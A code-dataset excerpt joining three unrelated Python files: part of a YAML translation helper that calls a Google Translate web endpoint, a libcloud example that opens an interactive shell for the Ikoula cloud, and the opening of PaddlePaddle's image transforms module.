data = original
else:
if self.starts_with_key(original):
saved_key = self.obtain_key(original)
translate_this = self.obtain_second_part(original)
if "\\n" in translate_this:
print('a3c')
data = saved_key + ': ' + self.fix_enters_keep(translate_this, "\\n")
elif "\n" in translate_this:
print('a3c')
data = saved_key + ': ' + self.fix_enters_keep(translate_this, "\n")
elif "'" in translate_this:
print('a3a')
data = saved_key + ': ' + self.fix_singlequote_keep(translate_this)
elif '"' in translate_this:
print('a3b')
data = saved_key + ': ' + self.fix_doublequote_keep(translate_this)
elif '<' in translate_this:
print('a3d')
data = saved_key + ': ' + self.fix_html_keep(translate_this)
elif '%{' in original:
print('a4')
data = saved_key + ': ' + self.fix_variable_keep(translate_this)
elif '#{' in original:
print('a4b')
data = saved_key + ': ' + self.fix_hashruby_keep(translate_this)
else:
print('a5')
data = saved_key + ': ' + self._get_translation_from_google(translate_this)
else:
data = self.original_work_distribute(original)
data = self.fix_yml(original, data, target_language, source_language)
else:
data = self._get_translation_from_google(text)
data = self.fix_google(data)
return data
def original_work_distribute(self, original):
if "\\n" in original:
print('c3c', original)
return self.fix_enters_keep(original, "\\n")
elif "\n" in original:
print('c3c', original)
return self.fix_enters_keep(original, "\n")
elif "'" in original:
print('c3a')
return self.fix_singlequote_keep(original)
elif '"' in original:
print('c3b')
return self.fix_doublequote_keep(original)
elif '<' in original:
print('c3d')
return self.fix_html_keep(original)
elif '%{' in original:
print('c4')
return self.fix_variable_keep(original)
elif '#{' in original:
print('c4b')
return self.fix_hashruby_keep(original)
else:
print('c5')
return self._get_translation_from_google(original)
@staticmethod
def starts_with_key(original):
print(20)
original_no_spaces = original.lstrip()
original_no_spaces_all = original_no_spaces.rstrip()
print(21)
original_key_is = original_no_spaces.split(':')
print(22)
key_has_spaces = original_key_is[0].split(' ')
print(23)
second_part_exists = ""
if len(original_key_is) > 1:
second_part_exists = original_key_is[1].lstrip().rstrip()
if ':' in original and ':' in original and len(original_key_is) >= 2 and len(key_has_spaces) == 1:
if len(second_part_exists) > 0:
print('has hey and second part has content:(' + second_part_exists + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return True
return False
@staticmethod
def obtain_key(original):
print(30)
first_source_colon = original.find(':')
keep_source_definition = original[:first_source_colon]
print('has hey called:(' + keep_source_definition + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return keep_source_definition
@staticmethod
def obtain_second_part(original):
print(40)
first_source_colon = original.find(':')
second_part = original[(first_source_colon+1):]
print('has second part:(' + second_part + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return second_part.lstrip().rstrip()
@staticmethod
def is_it_just_a_key(original):
print(10)
original_no_spaces = original.lstrip()
original_no_spaces_all = original_no_spaces.rstrip()
if original_no_spaces_all in (None, "'", '"', '', '<br/>', '</i>', '<strong>', '</strong>', '<i>', '<br>',
'</br>', '</ br>', '<br >', '<br />'):
# skip empty br's
return True
print(11)
original_key_is = original_no_spaces.split(':')
print(12)
key_has_spaces = original_key_is[0].split(' ')
print(13)
second_part_exists = ""
if len(original_key_is) > 1:
second_part_exists = original_key_is[1].lstrip().rstrip()
if ':' in original and len(original_key_is) >= 2 and len(key_has_spaces) == 1:
if second_part_exists in (None, '', '>', '|', '|-'):
print('row has a yml key:(' + original + ')')
# empty second meaning, then is a like == key: or key:> or key: |
return True
return False
def fix_too_long_text(self, original):
sentence_data = original
if len(original) > 256:
sentence_data = ""
split_sentences = original.split('.')
for sentence in split_sentences:
if '<' in original:
print('23')
sentence_data = sentence_data + self.fix_html_keep(sentence)
elif '%{' in original:
print('24')
sentence_data = sentence_data + self.fix_variable_keep(sentence)
else:
sentence_data = sentence_data + self._get_translation_from_google(sentence)
return sentence_data
def fix_variable_keep(self, sentence):
sentence_data = ""
split_percent = sentence.split('%{')
splitted_trans = ""
count_split = 0
for splitted in split_percent:
if splitted in (None, ''):
# case 1 "%{time_ago} Dernière connexion sur le compte : il y a %{%{time_ago}%{time_ago}.".split('%{')
# ['', 'time_ago} Dernière connexion sur le compte : il y a ', '', 'time_ago}', 'time_ago}.']
# splitted = split_percent[0] -- '' = splitted_trans = '%{'
# splitted = split_percent[1] -- 'time_ago} Dernière connexion sur le compte : il y a '
# splitted = split_percent[2] -- ''
# splitted = split_percent[3] -- 'time_ago}'
# splitted = split_percent[4] -- 'time_ago}'
# -
# case 2 "%{details_link}"
# ['', 'details_link}']
splitted_trans = splitted_trans + ' %{'
else:
if '}' in splitted:
# 'time_ago} Dernière connexion sur le compte : il y a '
cut_other_part = splitted.split('}')
# ['time_ago', ' Dernière connexion sur le compte : il y a ']
second_part_split = cut_other_part[1]
# ' Dernière connexion sur le compte : il y a '
if second_part_split in (None, ''):
splited_data = ''
else:
splited_data = self._get_translation_from_google(second_part_split)
if count_split == 0:
splitted_trans = splitted_trans + cut_other_part[0] + '} ' + splited_data
else:
splitted_trans = splitted_trans + ' %{' + cut_other_part[0] + '} ' + splited_data
else:
print('go 1')
splited_data = self._get_translation_from_google(splitted)
splitted_trans = splitted_trans + splited_data
count_split = count_split + 1
if count_split == 0:
sentence_data = sentence_data + ' %{' + splitted_trans
else:
sentence_data = splitted_trans
return sentence_data
def fix_hashruby_keep(self, sentence):
sentence_data = ""
split_percent = sentence.split('#{')
splitted_trans = ""
count_split = 0
for splitted in split_percent:
if splitted in (None, ''):
# case 1 "#{time_ago} Dernière connexion sur le compte : il y a #{#{time_ago}#{time_ago}.".split('#{')
# ['', 'time_ago} Dernière connexion sur le compte : il y a ', '', 'time_ago}', 'time_ago}.']
# splitted = split_percent[0] -- '' = splitted_trans = '#{'
# splitted = split_percent[1] -- 'time_ago} Dernière connexion sur le compte : il y a '
# splitted = split_percent[2] -- ''
# splitted = split_percent[3] -- 'time_ago}'
# splitted = split_percent[4] -- 'time_ago}'
# -
# case 2 "#{details_link}"
# ['', 'details_link}']
splitted_trans = splitted_trans + ' #{'
else:
if '}' in splitted:
# 'time_ago} Dernière connexion sur le compte : il y a '
cut_other_part = splitted.split('}')
# ['time_ago', ' Dernière connexion sur le compte : il y a ']
second_part_split = cut_other_part[1]
# ' Dernière connexion sur le compte : il y a '
if second_part_split in (None, ''):
splited_data = ''
else:
splited_data = self._get_translation_from_google(second_part_split)
if count_split == 0:
splitted_trans = splitted_trans + cut_other_part[0] + '} ' + splited_data
else:
splitted_trans = splitted_trans + ' #{' + cut_other_part[0] + '} ' + splited_data
else:
splited_data = self._get_translation_from_google(splitted)
splitted_trans = splitted_trans + splited_data
count_split = count_split + 1
if count_split == 0:
sentence_data = sentence_data + ' #{' + splitted_trans
else:
sentence_data = splitted_trans
return sentence_data
def fix_singlequote_keep(self, sentence):
sentence_data = ""
split_percent = sentence.split("'")
splitted_trans = ""
count_split = 0
for splitted in split_percent:
if splitted in (None, ''):
splitted_trans = splitted_trans + "'"
else:
splited_data = self.original_work_distribute(splitted)
splitted_trans = splitted_trans + splited_data
count_split = count_split + 1
if count_split == 0:
sentence_data = sentence_data + "'" + splitted_trans
else:
sentence_data = splitted_trans
return sentence_data
def fix_doublequote_keep(self, sentence):
sentence_data = ""
split_percent = sentence.split('"')
splitted_trans = ""
count_split = 0
for splitted in split_percent:
if splitted in (None, ''):
splitted_trans = splitted_trans + '"'
else:
splited_data = self.original_work_distribute(splitted)
splitted_trans = splitted_trans + splited_data
count_split = count_split + 1
if count_split == 0:
sentence_data = sentence_data + '"' + splitted_trans
else:
sentence_data = splitted_trans
return sentence_data
def fix_enters_keep(self, sentence, tipo="\n"):
print("fix_" + tipo + "_enters_keep", sentence)
sentence_data = ""
split_percent = sentence.split(tipo)
pprint(split_percent)
splitted_trans = ""
count_split = 0
for splitted in split_percent:
count_split = count_split + 1
print("simple splited_data", splitted)
if splitted in (None, ''):
print("adding enter")
splitted_trans = splitted_trans + tipo
else:
print("work distribute", splitted)
splited_data = self.original_work_distribute(splitted)
print("work translated", splited_data)
print("count_split", count_split)
if count_split < len(split_percent):
splited_data = splited_data + tipo
print("adding enter")
print("work translated", splited_data)
splitted_trans = splitted_trans + splited_data
print("split_percent", split_percent)
if count_split == 0:
sentence_data = sentence_data + tipo + splitted_trans
else:
sentence_data = splitted_trans
print("sentence_data", sentence_data)
return sentence_data
def fix_html_keep(self, sentence):
sentence_data = ""
split_percent = sentence.split('<')
splitted_trans = ""
count_split = 0
for splitted in split_percent:
if splitted in (None, ''):
# case 1 "%{time_ago} Dernière connexion sur le compte : il y a %{%{time_ago}%{time_ago}.".split('%{')
# ['', 'time_ago} Dernière connexion sur le compte : il y a ', '', 'time_ago}', 'time_ago}.']
# splitted = split_percent[0] -- '' = splitted_trans = '%{'
# splitted = split_percent[1] -- 'time_ago} Dernière connexion sur le compte : il y a '
# splitted = split_percent[2] -- ''
# splitted = split_percent[3] -- 'time_ago}'
# splitted = split_percent[4] -- 'time_ago}'
# -
# case 2 "%{details_link}"
# ['', 'details_link}']
splitted_trans = splitted_trans + ' <'
else:
if '>' in splitted:
# 'time_ago} Dernière connexion sur le compte : il y a '
cut_other_part = splitted.split('>')
# ['time_ago', ' Dernière connexion sur le compte : il y a ']
second_part_split = cut_other_part[1]
# ' Dernière connexion sur le compte : il y a '
if second_part_split in (None, ''):
splited_data = ''
else:
splited_data = self.fix_variable_keep(second_part_split)
# splited_data = self._get_translation_from_google(second_part_split)
if count_split == 0:
splitted_trans = splitted_trans + cut_other_part[0] + '> ' + splited_data
else:
splitted_trans = splitted_trans + ' <' + cut_other_part[0] + '> ' + splited_data
else:
splited_data = self.fix_variable_keep(splitted)
# splited_data = self._get_translation_from_google(splitted)
splitted_trans = splitted_trans + splited_data
count_split = count_split + 1
if count_split == 0:
sentence_data = sentence_data + ' <' + splitted_trans
else:
sentence_data = splitted_trans
return sentence_data
def _get_translation_from_google(self, text):
try:
json5 = self._get_json5_from_google(text).decode('utf-8')
except IOError:
raise GoogletTranslateException(self.error_codes[501])
except ValueError:
raise GoogletTranslateException(self.error_codes[503])
return self._get_translation_from_json5(json5.encode('utf-8'))
def _get_json5_from_google(self, text):
escaped_source = quote(text, '')
headerses = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/67.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/75.0.3770.100 Safari/537.36']
headers = {'User-Agent': headerses[random.randrange(len(headerses))]}
if self.proxyok == 'yes':
if self.proxytp == 'socks5':
opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS5, self.proxyho, int(self.proxypo)))
else:
if self.proxytp == 'socks4':
opener = build_opener(SocksiPyHandler(PROXY_TYPE_SOCKS4, self.proxyho, int(self.proxypo)))
else:
opener = build_opener(SocksiPyHandler(PROXY_TYPE_HTTP, self.proxyho, int(self.proxypo)))
request_url = self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s" % (
self.source, self.target, escaped_source)
print('request_url:' + request_url)
req = Request(request_url, headers=headers)
result = opener.open(req, timeout=2).read()
json = result
else:
try:
request_url = self.api_urls['translate'] + "&sl=%s&tl=%s&text=%s" % (
self.source, self.target, escaped_source)
print('request_url 2:' + request_url)
req = Request(request_url, headers=headers)
result = urlopen(req, timeout=2).read()
json = result
except IOError:
raise GoogletTranslateException(self.error_codes[501])
except ValueError:
raise GoogletTranslateException(result)
return json
@staticmethod
def _get_translation_from_json5(content):
# print(content.decode('utf-8'))
response = content.decode('utf-8')
fixedJSON = re.sub(r',{2,}', ',', response).replace(',]', ']')
data = json.loads(fixedJSON)
# print(json.dumps(data, sort_keys=False, indent=2, separators=(',', ': ')))
result = data[0][0][0]
return result
@staticmethod
def _unescape(text):
return loads('"%s"' % text)
def filter_tags(self, htmlstr):
re_cdata = re.compile('//<!\[CDATA\[[^>]*//\]\]>', re.I)
re_script = re.compile('<\s*script[^>]*>[^<]*<\s*/\s*script\s*>', re.I)
re_style = re.compile('<\s*style[^>]*>[^<]*<\s*/\s*style\s*>', re.I)
re_br = re.compile('<br\s*?/?>')
re_h = re.compile('</?\w+[^>]*>')
re_comment = re.compile('<!--[^>]*-->')
s = re_cdata.sub('', htmlstr)
s = re_script.sub('', s)
s = re_style.sub('', s)
s = re_br.sub('\n', s)
s = re_h.sub('', s)
s = re_comment.sub('', s)
blank_line = re.compile('\n+')
s = blank_line.sub('\n', s)
s = self.re_exp(s)
s = self.replace_char_entity(s)
return s
@staticmethod
def re_exp(htmlstr):
s = re.compile(r'<[^<]+?>')
return s.sub('', htmlstr)
@staticmethod
def replace_char_entity(html_string):
char_entities = {'nbsp': ' ', '160': ' ',
'lt': '<', '60': '<',
'gt': '>', '62': '>',
'amp': '&', '38': '&',
'quot': '"', '34': '"', }
re_char_entity = re.compile(r'&#?(?P<name>\w+);')
sz = re_char_entity.search(html_string)
while sz:
entity = sz.group()
key = sz.group('name')
try:
html_string = re_char_entity.sub(char_entities[key], html_string, 1)
sz = re_char_entity.search(html_string)
except KeyError:
html_string = re_char_entity.sub('', html_string, 1)
sz = re_char_entity.search(html_string)
return html_string
@staticmethod
def fix_yml(original, html_string, target_language, source_language):
original_no_spaces = original.lstrip()
original_key_is = original_no_spaces.split(':')
key_has_spaces = original_key_is[0].split(' ')
original_len = len(original)
original_no_spaces_len = len(original_no_spaces)
original_missing_spaces_len = original_len - original_no_spaces_len
original_missing_spaces = ' ' * original_missing_spaces_len
s = re.compile(r'<[ ]{0,1}/ (?P<name>[a-zA-Z ]{1,})>')
sz = s.search(html_string)
while sz:
entity = sz.group()
# print (entity)
key = sz.group('name')
try:
html_string = s.sub(r'</' + key.lower().strip() + '>', html_string, 1)
sz = s.search(html_string)
except KeyError:
sz = s.search(html_string)
# this is a key in yml --> last_connection_html:
# this is not a key in yml --> Dernière connexion sur le compte :
if ':' in original and ':' in html_string and len(original_key_is) >= 2 and len(key_has_spaces) == 1: # fix keep keys names
print('yml key protection:' + original + ')')
first_source_colon = original.find(':')
keep_source_definition = original[:first_source_colon]
# print('length(' + str(12) + ') def(' + keep_source_definition + ')')
first_translated_colon = html_string.find(':')
keep_translated_text = html_string[(first_translated_colon + 1):]
# print('length(' + str(32) + ') trans(' + keep_translated_text + ')')
html_string = keep_source_definition + ': ' + keep_translated_text.lstrip()
# new_largo = len(html_string)
print('original(' + original + ')')
# print('source_language(' + source_language + ')')
# print('target_language(' + target_language + ')')
if '{' in original and '{' in html_string and '%' in original and '%' in html_string: # fix % { to %{
html_string = html_string.replace('% {', ' %{')
if '},' in original and '} ,' in html_string: # fix } , to },
html_string = html_string.replace('} ,', '},')
if ': >' in original and ':>' in html_string: # fix :> to : >
html_string = html_string.replace(':>', ': >')
# restore white spaces
html_string_no_spaces = html_string.lstrip()
html_string_len = len(html_string)
html_string_no_spaces_len = len(html_string_no_spaces)
html_string_missing_spaces_len = html_string_len - html_string_no_spaces_len
# html_string_missing_spaces = ' ' * html_string_missing_spaces_len
print('original_missing_spaces_len(' + str(original_missing_spaces_len) + ')')
print('html_string_missing_spaces_len(' + str(html_string_missing_spaces_len) + ')')
if original_missing_spaces_len > html_string_missing_spaces_len:
html_string = original_missing_spaces + html_string
print('html_string(' + html_string + ')')
return html_string
@staticmethod
def fix_google(html_string):
s = re.compile(r'<[ ]{0,1}/ (?P<name>[a-zA-Z ]{1,})>')
sz = s.search(html_string)
while sz:
entity = sz.group()
# print (entity)
key = sz.group('name')
try:
html_string = s.sub(r'</' + key.lower().strip() + '>', html_string, 1)
sz = s.search(html_string)
except KeyError:
sz = s.search(html_string)
return html_string
if __name__ == "__main__":
import doctest
doctest.testmod()
| 45.526882 | 132 | 0.528072 |
2e79fe5f8a5d389300f6630bccfaa2d6262d5553 | 437 | py | Python | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 1,435 | 2015-01-07T05:32:51.000Z | 2022-03-25T19:39:34.000Z | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 1,158 | 2015-01-04T18:08:42.000Z | 2022-03-24T14:34:57.000Z | docs/examples/compute/cloudstack/start_interactive_shell_ikoula.py | zimventures/libcloud | be0765df384f1baccde24539156119856cb96816 | [
"Apache-2.0"
] | 832 | 2015-01-05T09:20:21.000Z | 2022-03-24T19:22:19.000Z | import os
# pylint: disable=import-error
from IPython.terminal.embed import InteractiveShellEmbed
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
apikey = os.getenv('IKOULA_API_KEY')
secretkey = os.getenv('IKOULA_SECRET_KEY')
Driver = get_driver(Provider.IKOULA)
conn = Driver(key=apikey, secret=secretkey)
shell = InteractiveShellEmbed(banner1='Hello from Libcloud Shell !!')
shell()
| 24.277778 | 69 | 0.803204 |
1a3dbd68066a72384589ac24579e0540b5484a6e | 45,883 | py | Python | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 17,085 | 2016-11-18T06:40:52.000Z | 2022-03-31T22:52:32.000Z | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 29,769 | 2016-11-18T06:35:22.000Z | 2022-03-31T16:46:15.000Z | python/paddle/vision/transforms/transforms.py | zmxdream/Paddle | 04f042a5d507ad98f7f2cfc3cbc44b06d7a7f45c | [
"Apache-2.0"
] | 4,641 | 2016-11-18T07:43:33.000Z | 2022-03-31T15:15:02.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import math
import sys
import random
import numpy as np
import numbers
import types
import collections
import warnings
import traceback
from paddle.utils import try_import
from . import functional as F
if sys.version_info < (3, 3):
Sequence = collections.Sequence
Iterable = collections.Iterable
else:
Sequence = collections.abc.Sequence
Iterable = collections.abc.Iterable
__all__ = []
def _get_image_size(img):
if F._is_pil_image(img):
return img.size
elif F._is_numpy_image(img):
return img.shape[:2][::-1]
elif F._is_tensor_image(img):
return img.shape[1:][::-1] # chw
else:
raise TypeError("Unexpected type {}".format(type(img)))
def _check_input(value,
name,
center=1,
bound=(0, float('inf')),
clip_first_on_zero=True):
if isinstance(value, numbers.Number):
if value < 0:
raise ValueError(
"If {} is a single number, it must be non negative.".format(
name))
value = [center - value, center + value]
if clip_first_on_zero:
value[0] = max(value[0], 0)
elif isinstance(value, (tuple, list)) and len(value) == 2:
if not bound[0] <= value[0] <= value[1] <= bound[1]:
raise ValueError("{} values should be between {}".format(name,
bound))
else:
raise TypeError(
"{} should be a single number or a list/tuple with lenght 2.".
format(name))
if value[0] == value[1] == center:
value = None
return value
class Compose(object):
"""
Composes several transforms together use for composing list of transforms
together for a dataset transform.
Args:
transforms (list|tuple): List/Tuple of transforms to compose.
Returns:
A compose object which is callable, __call__ for this Compose
object will call each given :attr:`transforms` sequencely.
Examples:
.. code-block:: python
from paddle.vision.datasets import Flowers
from paddle.vision.transforms import Compose, ColorJitter, Resize
transform = Compose([ColorJitter(), Resize(size=608)])
flowers = Flowers(mode='test', transform=transform)
for i in range(10):
sample = flowers[i]
print(sample[0].size, sample[1])
"""
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, data):
for f in self.transforms:
try:
data = f(data)
except Exception as e:
stack_info = traceback.format_exc()
print("fail to perform transform [{}] with error: "
"{} and stack:\n{}".format(f, e, str(stack_info)))
raise e
return data
def __repr__(self):
format_string = self.__class__.__name__ + '('
for t in self.transforms:
format_string += '\n'
format_string += ' {0}'.format(t)
format_string += '\n)'
return format_string
class BaseTransform(object):
"""
Base class of all transforms used in computer vision.
calling logic:
if keys is None:
_get_params -> _apply_image()
else:
_get_params -> _apply_*() for * in keys
If you want to implement a self-defined transform method for image,
rewrite _apply_* method in subclass.
Args:
keys (list[str]|tuple[str], optional): Input type. Input is a tuple contains different structures,
key is used to specify the type of input. For example, if your input
is image type, then the key can be None or ("image"). if your input
is (image, image) type, then the keys should be ("image", "image").
if your input is (image, boxes), then the keys should be ("image", "boxes").
Current available strings & data type are describe below:
- "image": input image, with shape of (H, W, C)
- "coords": coordinates, with shape of (N, 2)
- "boxes": bounding boxes, with shape of (N, 4), "xyxy" format,
the 1st "xy" represents top left point of a box,
the 2nd "xy" represents right bottom point.
- "mask": map used for segmentation, with shape of (H, W, 1)
You can also customize your data types only if you implement the corresponding
_apply_*() methods, otherwise ``NotImplementedError`` will be raised.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
import paddle.vision.transforms.functional as F
from paddle.vision.transforms import BaseTransform
def _get_image_size(img):
if F._is_pil_image(img):
return img.size
elif F._is_numpy_image(img):
return img.shape[:2][::-1]
else:
raise TypeError("Unexpected type {}".format(type(img)))
class CustomRandomFlip(BaseTransform):
def __init__(self, prob=0.5, keys=None):
super(CustomRandomFlip, self).__init__(keys)
self.prob = prob
def _get_params(self, inputs):
image = inputs[self.keys.index('image')]
params = {}
params['flip'] = np.random.random() < self.prob
params['size'] = _get_image_size(image)
return params
def _apply_image(self, image):
if self.params['flip']:
return F.hflip(image)
return image
# if you only want to transform image, do not need to rewrite this function
def _apply_coords(self, coords):
if self.params['flip']:
w = self.params['size'][0]
coords[:, 0] = w - coords[:, 0]
return coords
# if you only want to transform image, do not need to rewrite this function
def _apply_boxes(self, boxes):
idxs = np.array([(0, 1), (2, 1), (0, 3), (2, 3)]).flatten()
coords = np.asarray(boxes).reshape(-1, 4)[:, idxs].reshape(-1, 2)
coords = self._apply_coords(coords).reshape((-1, 4, 2))
minxy = coords.min(axis=1)
maxxy = coords.max(axis=1)
trans_boxes = np.concatenate((minxy, maxxy), axis=1)
return trans_boxes
# if you only want to transform image, do not need to rewrite this function
def _apply_mask(self, mask):
if self.params['flip']:
return F.hflip(mask)
return mask
# create fake inputs
fake_img = Image.fromarray((np.random.rand(400, 500, 3) * 255.).astype('uint8'))
fake_boxes = np.array([[2, 3, 200, 300], [50, 60, 80, 100]])
fake_mask = fake_img.convert('L')
# only transform for image:
flip_transform = CustomRandomFlip(1.0)
converted_img = flip_transform(fake_img)
# transform for image, boxes and mask
flip_transform = CustomRandomFlip(1.0, keys=('image', 'boxes', 'mask'))
(converted_img, converted_boxes, converted_mask) = flip_transform((fake_img, fake_boxes, fake_mask))
print('converted boxes', converted_boxes)
"""
def __init__(self, keys=None):
if keys is None:
keys = ("image", )
elif not isinstance(keys, Sequence):
raise ValueError(
"keys should be a sequence, but got keys={}".format(keys))
for k in keys:
if self._get_apply(k) is None:
raise NotImplementedError(
"{} is unsupported data structure".format(k))
self.keys = keys
# storage some params get from function get_params()
self.params = None
def _get_params(self, inputs):
pass
def __call__(self, inputs):
"""Apply transform on single input data"""
if not isinstance(inputs, tuple):
inputs = (inputs, )
self.params = self._get_params(inputs)
outputs = []
for i in range(min(len(inputs), len(self.keys))):
apply_func = self._get_apply(self.keys[i])
if apply_func is None:
outputs.append(inputs[i])
else:
outputs.append(apply_func(inputs[i]))
if len(inputs) > len(self.keys):
outputs.extend(inputs[len(self.keys):])
if len(outputs) == 1:
outputs = outputs[0]
else:
outputs = tuple(outputs)
return outputs
def _get_apply(self, key):
return getattr(self, "_apply_{}".format(key), None)
def _apply_image(self, image):
raise NotImplementedError
def _apply_boxes(self, boxes):
raise NotImplementedError
def _apply_mask(self, mask):
raise NotImplementedError
class ToTensor(BaseTransform):
"""Convert a ``PIL.Image`` or ``numpy.ndarray`` to ``paddle.Tensor``.
Converts a PIL.Image or numpy.ndarray (H x W x C) to a paddle.Tensor of shape (C x H x W).
If input is a grayscale image (H x W), it will be converted to a image of shape (H x W x 1).
And the shape of output tensor will be (1 x H x W).
If you want to keep the shape of output tensor as (H x W x C), you can set data_format = ``HWC`` .
Converts a PIL.Image or numpy.ndarray in the range [0, 255] to a paddle.Tensor in the
range [0.0, 1.0] if the PIL Image belongs to one of the modes (L, LA, P, I, F, RGB, YCbCr,
RGBA, CMYK, 1) or if the numpy.ndarray has dtype = np.uint8.
In the other cases, tensors are returned without scaling.
Args:
data_format (str, optional): Data format of output tensor, should be 'HWC' or
'CHW'. Default: 'CHW'.
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray): The input image with shape (H x W x C).
- output(np.ndarray): A tensor with shape (C x H x W) or (H x W x C) according option data_format.
Returns:
A callable object of ToTensor.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
import paddle.vision.transforms as T
import paddle.vision.transforms.functional as F
fake_img = Image.fromarray((np.random.rand(224, 224, 3) * 255.).astype(np.uint8))
transform = T.ToTensor()
tensor = transform(fake_img)
"""
def __init__(self, data_format='CHW', keys=None):
super(ToTensor, self).__init__(keys)
self.data_format = data_format
def _apply_image(self, img):
"""
Args:
img (PIL.Image|np.ndarray): Image to be converted to tensor.
Returns:
Tensor: Converted image.
"""
return F.to_tensor(img, self.data_format)
class Resize(BaseTransform):
"""Resize the input Image to the given size.
Args:
size (int|list|tuple): Desired output size. If size is a sequence like
(h, w), output size will be matched to this. If size is an int,
smaller edge of the image will be matched to this number.
i.e, if height > width, then image will be rescaled to
(size * height / width, size)
interpolation (int|str, optional): Interpolation method. Default: 'bilinear'.
when use pil backend, support method are as following:
- "nearest": Image.NEAREST,
- "bilinear": Image.BILINEAR,
- "bicubic": Image.BICUBIC,
- "box": Image.BOX,
- "lanczos": Image.LANCZOS,
- "hamming": Image.HAMMING
when use cv2 backend, support method are as following:
- "nearest": cv2.INTER_NEAREST,
- "bilinear": cv2.INTER_LINEAR,
- "area": cv2.INTER_AREA,
- "bicubic": cv2.INTER_CUBIC,
- "lanczos": cv2.INTER_LANCZOS4
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A resized image.
Returns:
A callable object of Resize.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import Resize
transform = Resize(size=224)
fake_img = Image.fromarray((np.random.rand(100, 120, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self, size, interpolation='bilinear', keys=None):
super(Resize, self).__init__(keys)
assert isinstance(size, int) or (isinstance(size, Iterable) and
len(size) == 2)
self.size = size
self.interpolation = interpolation
def _apply_image(self, img):
return F.resize(img, self.size, self.interpolation)
class RandomResizedCrop(BaseTransform):
"""Crop the input data to random size and aspect ratio.
A crop of random size (default: of 0.08 to 1.0) of the original size and a random
aspect ratio (default: of 3/4 to 1.33) of the original aspect ratio is made.
After applying crop transfrom, the input data will be resized to given size.
Args:
size (int|list|tuple): Target size of output image, with (height, width) shape.
scale (list|tuple): Scale range of the cropped image before resizing, relatively to the origin
image. Default: (0.08, 1.0)
ratio (list|tuple): Range of aspect ratio of the origin aspect ratio cropped. Default: (0.75, 1.33)
interpolation (int|str, optional): Interpolation method. Default: 'bilinear'. when use pil backend,
support method are as following:
- "nearest": Image.NEAREST,
- "bilinear": Image.BILINEAR,
- "bicubic": Image.BICUBIC,
- "box": Image.BOX,
- "lanczos": Image.LANCZOS,
- "hamming": Image.HAMMING
when use cv2 backend, support method are as following:
- "nearest": cv2.INTER_NEAREST,
- "bilinear": cv2.INTER_LINEAR,
- "area": cv2.INTER_AREA,
- "bicubic": cv2.INTER_CUBIC,
- "lanczos": cv2.INTER_LANCZOS4
keys (list[str]|tuple[str], optional): Same as ``BaseTransform``. Default: None.
Shape:
- img(PIL.Image|np.ndarray|Paddle.Tensor): The input image with shape (H x W x C).
- output(PIL.Image|np.ndarray|Paddle.Tensor): A cropped image.
Returns:
A callable object of RandomResizedCrop.
Examples:
.. code-block:: python
import numpy as np
from PIL import Image
from paddle.vision.transforms import RandomResizedCrop
transform = RandomResizedCrop(224)
fake_img = Image.fromarray((np.random.rand(300, 320, 3) * 255.).astype(np.uint8))
fake_img = transform(fake_img)
print(fake_img.size)
"""
def __init__(self,
size,
scale=(0.08, 1.0),
ratio=(3. / 4, 4. / 3),
interpolation='bilinear',
keys=None):
super(RandomResizedCrop, self).__init__(keys)
if isinstance(size, int):
self.size = (size, size)
else:
self.size = size
assert (scale[0] <= scale[1]), "scale should be of kind (min, max)"
assert (ratio[0] <= ratio[1]), "ratio should be of kind (min, max)"
self.scale = scale
self.ratio = ratio
self.interpolation = interpolation
def _get_param(self, image, attempts=10):
width, height = _get_image_size(image)
area = height * width
for _ in range(attempts):
target_area = np.random.uniform(*self.scale) * area
log_ratio = tuple(math.log(x) for x in self.ratio)
aspect_ratio = math.exp(np.random.uniform(*log_ratio))
w = int(round(math.sqrt(target_area * aspect_ratio)))
h = int(round(math.sqrt(target_area / aspect_ratio)))
if 0 < w <= width and 0 < h <= height:
i = random.randint(0, height - h)
j = random.randint(0, width - w)
return i, j, h, w
# Fallback to central crop
in_ratio = float(width) / float(height)
if in_ratio < min(self.ratio):
w = width
h = int(round(w / min(self.ratio)))
elif in_ratio > max(self.ratio):
h = height
w = int(round(h * max(self.ratio)))
else:
# return whole image
w = width
h = height
